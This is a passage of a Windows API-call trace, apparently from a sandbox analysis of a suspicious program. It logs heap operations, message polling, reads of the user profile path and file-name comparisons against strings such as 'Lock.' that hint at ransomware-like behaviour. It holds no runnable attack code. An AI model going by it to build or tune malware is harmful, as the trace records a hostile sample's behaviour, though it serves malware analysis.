hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.526] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5fNAF_eBT37aF.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fNAF_eBT37aF.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NAF_eBT37aF.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AF_eBT37aF.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F_eBT37aF.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_eBT37aF.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eBT37aF.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BT37aF.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T37aF.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="37aF.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7aF.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aF.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0190.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0190.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0190.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0190.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0190.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0190.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0190.527] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0190.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0190.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0190.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0190.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5fNAF_eBT37aF.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0190.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fNAF_eBT37aF.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NAF_eBT37aF.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AF_eBT37aF.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0190.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F_eBT37aF.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0190.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_eBT37aF.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0190.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eBT37aF.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0190.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BT37aF.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0190.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T37aF.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="37aF.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0190.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7aF.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0190.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aF.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0190.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0190.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36c0 | out: hHeap=0x25c0000) returned 1 [0190.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0190.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0190.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0190.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0190.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0190.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0190.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0190.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0190.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0190.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0190.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0190.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0190.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0190.528] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.528] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0190.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0190.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0190.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0190.529] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0190.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0190.529] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0190.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0190.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0190.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0190.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0190.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0190.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0190.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0190.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0190.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0190.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0190.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0190.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0190.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0190.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0190.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0190.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0190.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0190.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0190.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0190.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0190.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0190.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0190.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0190.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0190.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16e8 [0190.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0190.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0190.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0190.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0190.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0190.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0190.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0190.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b3020 [0190.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0190.530] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0190.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0190.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0190.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1b8 [0190.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0190.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0190.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa248 [0190.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0190.531] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0190.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0190.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0190.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0190.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0190.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0190.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0190.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0190.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0190.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0190.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0190.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0190.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0190.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0190.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0190.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0190.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x24b3020 [0190.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0190.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0190.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0190.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0190.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0190.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0190.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1908 [0190.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0190.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0190.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0190.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0190.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18e8 [0190.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0190.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0190.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0190.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1a0 [0190.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0190.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0190.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0190.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0190.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0190.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0190.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0190.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0190.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0190.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0190.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0190.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0190.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0190.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0190.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0190.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0190.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0190.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0190.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0190.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0190.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0190.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0190.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0190.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0190.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0190.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0190.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0190.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0190.533] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0190.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0190.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0190.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0190.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0190.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0190.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0190.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0190.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0190.534] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0190.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0190.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0190.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0190.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0190.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0190.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0190.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0190.534] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.534] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0190.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0190.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0190.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0190.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0190.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0190.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0190.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0190.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0190.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0190.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0190.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0190.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0190.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0190.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0190.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0190.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0190.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0190.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0190.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0190.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0190.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0190.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0190.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0190.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0190.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0190.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0190.535] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0190.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0190.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0190.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0190.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0190.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0190.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0190.536] RtlAllocateHeap 